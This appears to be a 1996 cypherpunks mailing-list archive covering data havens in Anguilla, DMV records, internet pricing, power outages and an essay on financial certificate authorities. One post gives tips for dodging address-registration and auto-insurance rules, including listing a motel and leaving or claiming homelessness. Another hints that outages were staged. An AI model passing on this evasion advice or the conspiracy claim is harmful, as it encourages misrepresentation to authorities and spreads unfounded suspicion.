>of tropical islands than in the fog of San Francisco. When you
>can work in the shade of a palm tree, even if you should earn
>less, it's worth it :-)

As attractive as this sounds, historically this has not happened. And as
many will tell you, the climate of the Bay Area in particular and
California in general is extremely benign and delightful. The average
winter temperature is only about 10C cooler than summer temperatures.
Evenings are not balmy, but neither are they oppressively hot.

Interestingly, and not really related to CP themes, the fact is that is
that most technological developments have come out of cooler climes. Not a
lot of stuff from tropical and island climes. Maybe they realize life is
too good eating roast pig at the beach luau, maybe they are too lethargic
from the heat, maybe tropical diseases and mosquitos have taken their toll,
maybe....

I know an awful lot of folks who could easily affort to move to almost
anywhere in the world, and yet they stay in California. (I also know folks
moving to even cooler climes, in the U.S., especially less-crowded areas.)

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Zerucha <root@deimos.ceddec.com>
Date: Tue, 13 Aug 1996 02:54:03 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: s/key for linux?
In-Reply-To: <2.2.32.19960801042307.00679844@gonzo.wolfenet.com>
Message-ID: <Pine.LNX.3.95.960811132738.1698C-100000@deimos.ceddec.com>
MIME-Version: 1.0
Content-Type: text/plain


I managed to get it working enough to fit into tis fwtk.  You need to add
some bsd stuff, and/or move some includes.

zerucha@shell.portal.com
finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Mon, 12 Aug 1996 03:31:51 +0800
To: cypherpunks@toad.com
Subject: Re: Rumors of death of Anguilla Data are greatly exagerated.
In-Reply-To: <v02120d02ae332cab9cff@[192.0.2.1]>
Message-ID: <Pine.LNX.3.91.960811133518.3067A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



Tim:
>(I have respect for what Vince did, by actually moving to the Caribbean and
>setting up a data haven/offshore ISP business. 

Thanks.

>However, just as we discuss
>the situation about remailers going down, or monitoring the cleartext, or
>blocking certain addresses, so too should we discuss what Vince is choosing
>to do. Maybe he is ultimately right, maybe not. I'm including this preface
>just so no one thinks I'm trying to start a feud. No way.)

Sure.  There are things to figure out, lessons to learn, ...

>>This is a fraud by taxbomber.  He is totally involved with selling fake
>>passports.  He calls them "camouflage passports" and they have names like
>
>"What is truth?" Many of the things customers of a data haven are likely to
>be doing are "fraudulent" or "illegal" in some jurisdictions....I'm sure I
>don't have to spend effort here citing examples from religious, medical,
>and business domains.

The fraud I meant was his saying that he is not selling fake passports in
his "fee sorry for me I got cut off" post.  He was selling fake passports. 

>Selling fake passports seems not to be something Vince ought to even be
>paying attention to. Granted, pressure from outside states may put pressure
>on Vince, but this actually confirms my worst (OK, _nearly_ my worst)
>suspicions about the viability of such data havens.

Remember regulatory arbitrage.  The more jurisdictions on the Intenet,
the better for users.  That some things are not permitted in Anguilla
does not mean it is not a viable jurisdiction for some other things.
For example, tax free corporations, IPOs over the Internet, gambling
(Anguilla should have bingo on the Internet by the end of next month).

Vince
>My lawyer called me up and told me that fake passports are illegal in
>Anguilla and that I should pull this guy immediately.  I did. It is our
>policy to not permit anything on our servers that is illegal in Anguilla.
>My lawyer is where I get the definition of "illegal in Anguilla".

Tim:
>Instead of "pulling" this guy, did you first send a copy of your lawyer's
>letter to you to this guy, and advise him that he should remove just this
>one specific item, the allegedly illegal British Honduras passports?

After my lawyer called I disabled the web access.  I believe this is a big
part of his business, and it really just makes more sense for him to use
another provider than to remove it.

>Tim:
>Then I suggest you carefully provide a full copy of what you consider to be
>illegal to all subscribers.

Will do.  More than just leggality, what I consider acceptable.
This will show up as  http://online.offshore.com.ai/rules.html

>I have some questions, though. Would bomb-making instructions be legal or
>illegal, acceptable or not acceptable on your system? How about "Kill the
>Queen" screeds? And so on.

Not acceptable.  This is not the market I am after.  I don't see the
profit in it.  

>If you "pull" the entire account of a business when the Governor-General,
>or His Royal Excellency--or whomever it is that runs Anguilla--applies
>pressure....well, you won't have much of a real data haven, now will you?

I may not have your idea of a data haven.  But there are things, 
like no-taxes, where Anugilla has stood up to the US pressure for years.

>>He also suggested opening up bank accounts with these fake passports 
>> (encouraging fraud).
>
>On this last point, how is this "encouraging fraud"?

If the laws of a country say it is fraud to open a bank account with 
a fake passport, then encouraging someone to do so is encouraging
fraud.  Check with your lawyer and see if you can open up a bank
account with a fake passport.  If I were making the laws I would
permit numbered accounts etc, so there was no interest in fake passports
for bank accounts.

>Then they deny the loan.

One use of fake ID is to open up loans or credit cards under fake names, 
get some money, and then toss the fake ID and never pay, and never be found.
You would agree that is fraud?

Tim:
>I should remind readers that it is legal
>to sell such passports in the U.S....somewhere I have one that says "This
>document not good for travel in the People's Republics of Berkeley, Santa
>Monica, and Madison," or somesuch.

Regulatory arbitrage is a fun thing.  If you want to do something that
is not OK in Anguilla, but is in the US, then you should do it in the US.

    --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 12 Aug 1996 17:15:49 +0800
To: cypherpunks@toad.com
Subject: Unmetered Net Usage
Message-ID: <ae33ffaf03021004fdeb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:34 AM 8/12/96, Rabid Wombat wrote:
>(no crypto here, so delete it already)  :)

A good rant, in the best sense of the word.

>players will be the same as today, that depends. If the railroads had
>realized that they were in the transportation business, instead of the
>train business, they'd be flying airplanes today.

I've heard this example used for years, and I'm skeptical. The methods and
experts needed by early aviation companies were completely different from
the methods and experts the railroad companies had; I'm not convinced that
deciding one is in the "transportation business" is the key.

>Anyone that wants to carry a large volume of traffic via the 'net will
>find that either the market will dictate that they pay for the bandwidth
>they use, or the FCC will. I don't see the FCC getting involved, unless
>the "phone service via internet" providor tries to use the courts to get
>out of paying for the bandwidth they use. They'll be restricted by the
>size of the "pipe" they purchase from their ISP, and the ISPs all charge
>more for access from larger "pipes." If they lease their own
>cross-country circuits, they'll pay the same (or higher) costs as the Telcos.

I see zero chance a local ISP will attempt to use the courts to "get out
of" a charge he has incurred. For one thing, his supplier can simply say
"you don't pay, you get cut off," and be supported by the courts. For
another, even the ISP may not be able to simply tell which customers are
using telephony programs and which are just dowloading pictures of Christy
Canyon.

Will "unmetered" usage go away? It depends on a lot of factors. Right now,
unmetered usage is a big enough marketing draw that it appears to
outcompete metered usage plans. Sure, there are people like me who pay a
flat rate (in my case, $20/month) and yet who are on for several hours a
day. But the subscribers who also pay the $20/mo and yet who are on only
briefly to check their mail are not clamoring to switch to metered usage.

If Internet telephony becomes a big deal, I still suspect unmetered usage
will be common. If the capacity isn't there, from the ISP through the
various links to the other person's ISP then there will be stalls and
delays. Think of it as evolution in action, like crowded freeways.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Mon, 12 Aug 1996 05:14:31 +0800
To: cypherpunks@toad.com
Subject: Re: Rumors of death of Anguilla Data are greatly exagerated.
In-Reply-To: <Pine.LNX.3.91.960811142731.3169A-100000@offshore>
Message-ID: <Pine.LNX.3.91.960811145436.3170B-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



Perry E. Metzger <perry@piermont.com>
> Vince has the right to run his business any way he likes.

This is a very good libertarian point.  

> Vince has made it very clear that he is NOT a data haven. Anguilla is
> a TAX HAVEN. That is, if you are selling copies of some software over
> the net or what have you, and you run the business out of Anguilla,
> you are not liable for any Anguillian taxes because there are none.
> 
> Anguilla is *not* a data haven, drug haven, or any other sort of
> haven. I would have thought that Vince made this clear.

And Anguilla is first and foremost a taxhaven.  But it tries hard to be a
very clean taxhaven (does not want drug money etc).  I think that "clean"
corporations operating here tax free is a potentially huge market. 

Anguilla and OIS are not the data haven of cypherpunks wet dreams. Neither
Anguilla nor I want "hit men for hire" advertising here. Sorry Tim.  And I
think the loss in clean business would outweigh any money from such by a
long shot. 

The concept of a datahaven is still evolving.  There are things that we
can and will do from Anguilla.  So while Anguilla may not really far along
the cypherpunk datahaven scale at this point, I would not go so far as to
say it is not a datahaven. 

One simple example is that OIS was given a project Gutenberg CD-ROM and
may sell online copies of old books.  Some countries are extending
copyrights back further into the past.  Anguilla is not.  So we could sell
books that have expired copyrights in Anguilla but not expired in USA etc. 
Think regulatory arbitrage.  

Taxhavens are a huge and well understood market.  Datahavens are still
new. Not counting gambling, they may only be $0/year rounded to the
nearest million. 

   --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 12 Aug 1996 06:04:39 +0800
To: "David E. Smith" <cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <2.2.32.19960811195935.00993f9c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:28 PM 8/9/96 -0500, David E. Smith wrote:

>In Missouri, that's all they wanted (a PO Box).  That's
>perfectly copacetic by them.  If you want to register for
>voting - since we have Motor Voter - they of course need
>a real address.  And the post office's requirements for
>getting a PO Box are nearly nonexistent.

Using a Mail Receiving Service (MRS) address will usually work.  Many
bureau-rats have yet to compile or use a list of Mail Receiving Services.
There *are* commercial firms that do compile such lists but they have to be
used to be any good.

In those rare cases where they turn you down for a registration or drivers
license because they happen to notice that you are using a MRS, you can find
a real person to accept your mail for you.  I solved the problem once by
advertizing on Usenet newsgroups for an address and cut a deal.  Another
possibility is to use the "homeless defense."  I'm homeless, this is the
only address I have.  Auto insurance companies are more likely to give you
trouble than government if you use an accommodation address since they have
actual money to lose.  There are still 10 or so states that do not require
auto insurance so by forum shopping, one can dodge this problem and save
money at the same time. 

Most states are not so fussy, and one can usually just use MRS addresses.
Litigation to force you to list a "real" address is exceedingly rare (it's
not worth the government's time).  This is particularly so since it is
trivial to switch cities, counties, states, and countries (if in the US use
Canada) for official address purposes.  You control your address.  Move into
a hotel/motel that rents by the week, list the address, and then leave.  

Even in the Nazi strongholds of Mitteleuropa with their address registration
laws, one can crash with friends or sublet apartments and avoid the process.
Holiday cottages let a month at a time is another technique.  Plenty of
Germans are living unregistered lives even today.

Residence=Domicile

Domicile requires "actual physical presence plus intent to make it your
home."  *Your* actions establish intent not any actions by the government.

DCF

"Last year, the Government of the United States collected more taxes from
the American people than any unit of government has ever collected before in
the history of mankind -- and still it's not enough."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bg809@scn.org (Jeffery Foy)
Date: Mon, 12 Aug 1996 12:25:47 +0800
To: pstira@escape.com
Subject: Re: DMV/Public record data on CDROM
In-Reply-To: <199608100338.XAA11082@escape.com>
Message-ID: <njmDyoQ0mkvD091yn@scn.org>
MIME-Version: 1.0
Content-Type: text/plain


>There are several state's DMV data (or other public record data such as
>Voter Registration) available on CD-ROM, with DOS search engines.
>
>I have the demos for some of these programs on
>
>    http://www.escape.com/~pstira/pi
>
>Oregon is not the only place you can obtain this type of information.

The question turns out not to be "can this be done". It seems to be more 
like - now that it is done, can you have your information removed if you 
wish?

-- 
  Jeffery Foy via bg809@scn.org -  PGP Public Key available by Request
     Verbosity is the refuge of those with nothing original to say
   Key Fingerprint: C6 6E BE 09 FA 9B 30 53  FA 4B FE F3 F0 28 56 96




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 12 Aug 1996 09:51:42 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <199608112354.QAA21856@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>This brings up an interesting point.  Is it poosible to obtain the list of
>all the individuals/corporations that have purchaced the list of DMV
>information and post *THAT* information to the net.  I think that people
>would be surprised just who uses that information and for what...

Many states have open records laws, and Oregon seems like the type
that would.  You might try asking your Legislator's (or their staff) first 
before going to the DMV, since Legislators are more likely to say
"Yes, we're helpful and friendly and like interacting with the public",
while DMV bureaucrats say things like "No" and "Go stand in line, peon".


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@ARC.unm.EDU>
Date: Mon, 12 Aug 1996 09:22:08 +0800
To: "i am not a number!" <cypherpunks@toad.com
Subject: Re: photographed license plates
Message-ID: <1.5.4.16.19960811231209.3c677258@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08.23 AM 8/9/96 -0700, i am not a number! wrote:

>>How?  Their license plates have been photographed.
>>... and the cheery "news" anchorwoman sweetly moved on to the next
>>story.....

[...]

>O, and I think they're talking more about putting up cameras at some 
>troubling intersections to take pictures of cars running red-lights.
>
>And cameras on transit vehicles (buses primarily).
>
>Gee, I am starting to feel so warm and safe!

Typical prole. Doesn't know what's good for him.

===============================================================================
David Rosoff (nihongo ga sukoshi dekiru)  --------------->  drosoff@arc.unm.edu
PGP public key 0xD37692F9 -----> finger drosoff@acoma.arc.unm.edu or keyservers
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Is it a forgery? --- I have PGP signed all email and news posts since May 1996.
===============================================================================
"Your Honor, I have been following this person's movements for quite some time,
and I can prove that he is in possession of secret government underwear."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMg5oqxguzHDTdpL5AQGdOAQAmAjdOJzLTavjv2wsMwiJKKYc2vI2t9pk
CK4lzP163lEwIbvaQsDg9sLm4CmV+6JYV4+YbeLcSLLW5xNoCHV+Eh8XkDFC+fpP
XF4wjYdQyux+WF/vYeNBcnKdtMb+VKD/+P9nkSmYexuRiGMmsMDHvX2znHKWOIa0
ko8Vul1tkuQ=
=o/Ge
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@central.cis.upenn.edu>
Date: Mon, 12 Aug 1996 08:05:16 +0800
To: "I=(!isnum(self))" <cypherpunks@toad.com
Subject: Re: US Power Outages
Message-ID: <2.2.32.19960811221550.006da548@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


As someone who was married in NYC during the 65 blackout *happened at 1716
-- the blackout , the wedding at 1705, I have watched with interest the
attempt to explain that blackout and how to prevent such. We have not
progressed very far. The avalanche behavior of power systems is still not
well understood and techniques to prevent such failures are not obvious.
Same can be said of telephone and computer networks at different levels.

Dave





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 12 Aug 1996 08:36:57 +0800
To: cypherpunks@toad.com
Subject: e$: I Never Meta-Certification...
Message-ID: <v03007804ae33faa983c9@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL 1.0-----

e$: I Never Meta-Certification...

Verisign, NRC-CRISIS, Crypto vs. Encryption, "Half-Way" Measures,
Meta-Certification, Reputation Rental, FLAs, Groucho Marx, and a Proto-Call
for IFCA Founders.

August 11th, 1996

About a month ago, after the July DCSB meeting, I had a drink with Jon
Matonis, who's in charge of Financial Products for Verisign. We talked about
a lot of stuff, but, since he was buying, :-), we talked a lot about
certification authorities (CAs), specifically, financial certification
authorities. Verisign financial certification authorities, to be completely
precise.


I have to admit up front that until then, I didn't follow the CA world all
that much. I've been a Web-of-Trust guy, and I still think the world will go
to more geodesic trust models sooner or later. The only "certificates" I
care much about are the "digital bearer" kind. In a financial sense, I see
certificate authorities as a way to extend book-entry accounting to the
internet, and I'm more interested in edgier stuff: what I claim will be the
re-emergence of cash-settled bearer certificates in the financial markets,
this time in digital form, on public networks. CAs and link-level encryption
are just a way, as someone from MIT said to me at MacWorld this week, to
move the old private networks out onto the net, which, to my mind, are the
same thing to digital commerce that derigibles were to aviation. Yes, they
look like ships, which we know all about, and they *can* fly, but...

Anyway, it's clear we're moving from a world of insecure transactions on
private secure networks to one of secure transactions on insecure public
networks. CAs, SSL, and the whole enterprise of encrypting links between
accounting databases seem to be halfway measures to me. They're a way to
create, like our friend from MIT says, a temporary private secure network,
so you can send properly authorized, but still unsecure, book-entry down it.
For that "proper authorization", you need the biometric identity a CA
provides, so you can hunt down and jail miscreants who change the wrong book
entry. I've even made biometric-identity CA jokes about "X.BlaBla" and
"Numbers of the Beast", and all that.


Which reminds me of something Steve Kent said at the NRC CRISIS report
roadshow this week. He likes to make the distinction between cryptography
and encryption. That is, governments tolerate cryptographic signatures
because they can still read your mail, while they don't tolerate encryption,
because, well, they can't read your mail.

Frankly, I see that as a false dichotomy, and I think most crypto people do,
too, but, since the major selling point for cryptography to business is that
need to keep their book-entries clean, this gives governments a lot of
breathing room.  As long as most other businesses (call criminal enterprise
a business for the time being) can't read the encrypted link, businesses are
happy, and will accept watered-down *cryptography*, not just encryption. The
problem, of course, is that *governments* will have the ability to read
those messages, and even forge those signatures, and businesses aren't to
the point where they're sensitive about this.

Given the ubiquity of the invasiveness of modern industrial government in
the affairs of business, not only with respect to regulation, but also with
the ability to audit for taxes and other reasons, it may take a while for
business to wake up to their own need for privacy through strong
cryptography. But they will. Governments are made of people, of course, and
when it's possible to create enormous financial advantage for yourself by
reading financial transaction data, some of those people will do so, and,
given the ubiquity of networks, they'll be able to get away with it. When
you outlaw crypto, only outlaws have crypto, and all that. However, the
*business* knows they've been robbed, and, since government employees are
the only ones with the power to break the link and forge signatures, either
through computational horesepower or key escrow, who are going to be the,
heh, usual suspects? A bad place for a nation-state to be in, it seems to
me. Cleptocracy may work in *some* places, but in general they're bad for
business.

Finally, there's a red herring in all of this, and that's the so-called
exemptions for "financial activity" from much proposed cryptography
controls. So, how do you know what's financial activity and what isn't if a
message is encrypted? This doesn't even take into account the fact that, if
bearer certificate technology takes off, from micropayments like Micromint
and Millicent, through ecash and on to digital bearer certificates for
foriegn exchange (a $3 trillion daily business), the sheer volume of
encryption on the net, of the strongest possible form, is going to explode.

Don't get me wrong, I like the CRISIS report, because they are, to use a
beloved scatalogical expression, inside the tent and er, pointing, out. But,
to beat a few more metaphors like dead horses :-), the CRISIS report is
trying to "decompress" government into a world where they can't really
wiretap anymore. To do that, they want to start the bar at, say, 56-bit DES
and 1048-bit RSA, and move it up as technology, er, improves. In this, they
remind me more of someone trying to shovel uphill against an avalanche. If
you can't sign a mortgage with a signature long enough to withstand 30 years
of Moore's law, or encrypt something you don't want others to read for that
long, then why do it at all?  A little bit of encryption is like being a
little bit pregnant --. OK, OK, I'll give the metaphors a break now... :-).


So, we're back in the hotel bar, and Jon was buying, and I'm listening.
(Besides, Jon's an original e$pam subscriber, and he's *still* one, so I had
*better* listen.) He has a point when he says that most of the stuff I'm
interested in is out *there* somewhere, and the way you make money is here
and *now*, where the "halfway measures" live. Jon says that as far as he's
is concerned, of all the different kinds of businesses you can use
certification authorities for, banks and financial institutions the low
hanging fruit, and he and his bunch are out there shaking the trees for all
they're worth. Go, Jon, go.

So, why *doesn't* Verisign rule the world of financial CAs already? After
all, they have the patents, "modulo" the debate on the legal strength and
longevity thereof. From the standpoint of mobilized resources, they're
literally the only game in town, and, even if they aren't, with a tip of the
black cryptographer's hat to Redmond, a lack of uniqueness hasn't kept other
first movers from software hegemony before, anyway.

Well, first of all, let's assume the market's already there for book-entry
transactions on the internet (like credit and debit cards, and counter-cash
like Mondex). Yeah, I know, "assume a frictionless surface". But, everyone
else around here does, so we'll fiat the issue for the time being. Last
Sunday's "Shoe" cartoon, about the wizard spending $300 in webware upgrades
while ostensibly learning to get rich doing web commerce, to the contrary.

Second, we can assume that banks need certification, for all the reasons I
outlined above: In order to move book-entries around the net, you need
*functionally* encrypted links (for the time being, what technology and
governments let us have) and the digital authority to change those
book-entries. Operationally, they may not need strict biometric identity
just to map a signature to an account full of money, but we'll deal with
that some other time.

Now, let's look at what I presume is Verisign's business strategy for
financial markets. They're trying to build a superheirarchy of all those
bank heirarchies, so that those banks can clear trades with each other, on
the net, without using a proprietary network to do it. This is, of course
admirable, if not necessary, if banks want to do internet commerce
efficiently with their customers. It will be necessary when electronic
checks come on line, say, next year, because even though ACH is out there on
the other side of those internet-ACH gateways, there might come a time where
banks will want to clear checks against each other directly. Having a CA's
CA, CA^2, if you will, will make that possible.

To make this happen, Verisign doesn't want you to be you unless Verisign
says you're you, to paraphrase the old underwear comercial, and that, I
believe, is the problem. Verisign is not paying attention to what it really
is: a software vendor. It is not a financial intermediary, which is what
this CA's CA would be, by definition.

A financial intermediary, especially one on the net, is in effect "renting"
its reputation to a trade until it clears. It is saying, first and foremost,
that the trade will be safe, effectively risk-free, or at least
risk-calculable, to both parties of the trade. What it does to control that
risk is almost immaterial as long as it works, but, in this case, it is to
use RSA as the technical means of identifying the parties of the trade, with
a link to a "biometric" identity of either party. If you can call it
"biometric" for a financial institution.  The financial institution then, of
course vouches for the contents of the particular account being offset, the
book-entries swap, and the trade is over.

Like flying an airliner, of course, this is the easy part. If the trade is
broken, what does Verisign do? Of course, it can refuse to do trades with
the offending party. It can even call the law. The former is much more
powerful, however, and, frankly, it's the only enforcement mechanism which
we'll be able to use someday anyway. Physical force costs a lot to use, even
if you can buy it wholesale, at the government rate.

Fortunately, this kind of "club", as Eric Hughes calls it, is the
predominant way of renting reputation in the financial community. Think of
NYSE, or NASD, or CBOT, or NIDS, or SIAC, or any other FLA. ;-). (Yes,
there's DTC, and CUSIP, and Other-Letter-Acronyms too.) They're pretty easy
to set up. Verisign itself is *not* how to do it, however. They would to
*sell* to this reputation-rental entity.

Every one of the above entities is an association
(not-necessarily-non-profit), or, more usually, a member-owned corporation.
So, with that in mind, internet financial institutions like banks could
create an association or member-owned corporation, which would "rent"
reputation and function as a financial intermediary between members.
Obviously we shouldn't restrict membership in this organization to just
depositories like banks, because non-depositories will be significantly
involved in internet commerce. See Phil Webre's CBO study on electronic
retail payments for more on that.

Here is one way that could be done. A bunch of banks -- and non-depository
financial intermediaries, like digital cash underwriters / trustees, payment
gateway companies, (someday maybe Millicent brokers and MicroMint issuers)
- -- could get together, purchase shares for startup money, and form a
certification authority for themselves. Revenue could come from processing
and membership fees. They could then contract with Verisign to build their
system. Of course, they could contract with someone else, too, but I expect
that Verisign is in the best position to do this at the moment. In addition,
Verisign would probably be the technology of choice for the subordinate
certification heirarchies those financial intermediaries use with their
customers. Pretty lucrative, but it is also tempered by whatever patent
lifetimes Verisign has hanging over its head.

Here's what that gets us. We get the ability for any member to clear any
trade of any agreed-upon financial instrument (subject to legal
restrictions, of course) with any other member, no matter where they are in
the world, using the internet as the transport mechanism. Very powerful
stuff indeed. In fact, this *organization* can be located anywhere, which
gets really interesting, but we'll save that for some other discussion.

Notice that I'm not saying that this would be a monopoly. Just like several
countries have multiple stock and commodity exchanges, there will probably
be multiple financial certification associations like this one. In fact,
that's the core of a good prima facie name. The Internet Financial
Certification Association. Nice ring to it. Four-Letter Acronym, too.

I also expect that these kinds of "heirarchies" will probably devolve into a
geodesic, too, but they'll probably survive the change, because there'll
always be a market for, er, inter-mediary intermediation. I feel vaguely
like Frege, or Russell, or Goedel here. Maybe (Groucho) Marx?


So. Like most internet enterprise ideas, all it takes is a mailgroup, and,
later, a meeting (I can think of this *nice* time and place in Anguilla
;-)), to set this up. Obviously, the membership/shareholders of the proposed
IFCA should be companies, and the management of this enterprise should come
from the membership, or at least hired by them. Any individuals (like
myself, for instance) who participate at this stage are just kibbitzers
along for the ride, unless they're planning to be an internet financial
institution, of course. :-).

As a sort of test of the idea, I've gone and set up yet another mail-group
on thumper (<mailto://majordomo@thumper.vmeng.com>, with " subscribe ifca "
in the body of the message) to discuss it. We'll move it someplace else
later, if necessary. If there's enough interest from the right people,
expect a call for founders sometime soon. If there isn't, it'll sink
without a trace, as
it should.

So, if you, or anyone you know, is part of a financial institution involved,
or wishing to get involved, in financial transactions on the internet, pass
this rant along to them. Well, maybe not the *whole* rant, it might scare
them. :-). But enough necessary to give them the idea, anyway. I expect that
the places I put this rant will probably be enough to get critical mass for
the mailgroup, at least, and we'll take it from there.

Cheers,
Bob Hettinga










-----BEGIN PGP SIGNATURE-----BY SAFEMAIL 1.0-----
Version: 2.6.i

iQCVAwUBMg5FQvgyLN8bw6ZVAQF2GQP/fPHzQmgLy2ZOO8qTQIZoBgyiOUxXxkDA
hoWJOc0BO5IoeK+JETLTiH5BNxbVqnWQiCO0N13RWXEDFyaBHAmRoujG1hgzs2e0
zYIS37jab3nPH7bkznswQJXOgOYBu9qRtZqrP5VonWXQxz2Zw5izFqdOIiOgoANv
0xMO8UayXEY=
=MTk+
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bugs@netcom.com (Mark Hittinger)
Date: Mon, 12 Aug 1996 11:54:14 +0800
To: cypherpunks@toad.com
Subject: re: US Power Outages
Message-ID: <199608120133.SAA26983@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>
> I wonder if someone's probing power-system vulnerabilities and defense 
> strategies.
> 
> Just coincidental that there's been all this noise about power grid 
> vulnerability and two vast regional outages this summer?
> 

The week before twa800 Clinton signed that executive order creating the
"infrastructure protection task force".  Now we are having massiv power
outages "caused by trees".  Sounds like they are trying to make swamp
gas fly again.

Later
Mark Hittinger
Netcom/Dallas
bugs@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 12 Aug 1996 12:58:38 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB87DE.CFF8D020@groningen15.pop.tip.nl>
Message-ID: <Pine.SUN.3.91.960811184629.22848D-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 11 Aug 1996, Bart Croughs wrote:

> If American companies are moving capital to Third World
> countries because of the low wages in these countries, then the
> workers in the Third World will of course be better off. But in
> the US, the amount of capital will be lowered. So the American
> workers will be able to get other jobs, but these jobs will pay
> less, because of the diminished amount of capital in the US.

The fallacy in this argument is the assumption that because some
American capital moves overseas, there will be less capital 
available in the US for investment/wages.  It doesn't contemplate
infusion of foreign capital investments in American industries 
that have a competitive advantage over their foreign competition.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 12 Aug 1996 05:14:24 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Massively parallel carbon-unit-based voice pattern matching
In-Reply-To: <199608092330.QAA26402@mail.pacifier.com>
Message-ID: <Pine.BSF.3.91.960811185455.24521B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In other words, could somebody fake a bomb threat using a recording which 
> has been processed to sound "exactly" like some famous person whose voice 
> you can analyze?  
> 

In theory, yes; with digitized sound, anything is "possible."

However, in practice, it isn't all that different from altering digitized 
photos. In theory, a "perfect" false image could be produced, but in 
practice, subtle errors are detectable. Once you've detected that 
alteration has occurred, the information is suspect, and the 
perpetrator has added clues as to his/her identity.

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 12 Aug 1996 09:28:51 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB87DE.CFF8D020@groningen15.pop.tip.nl>
Message-ID: <199608112336.TAA13447@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bart Croughs writes:
> 	 But there is another axiom of economics which the
> nationalist/socialist can use for his case against the free movement of
> capital. This axiom states that the wages of workers depend on the
> amount of capital invested. The more capital invested, the higher the
> wages are.

This must be some new axiom of economics that I had not heard of.

>  If American companies are moving capital to Third World
> countries because of the low wages in these countries, then the workers
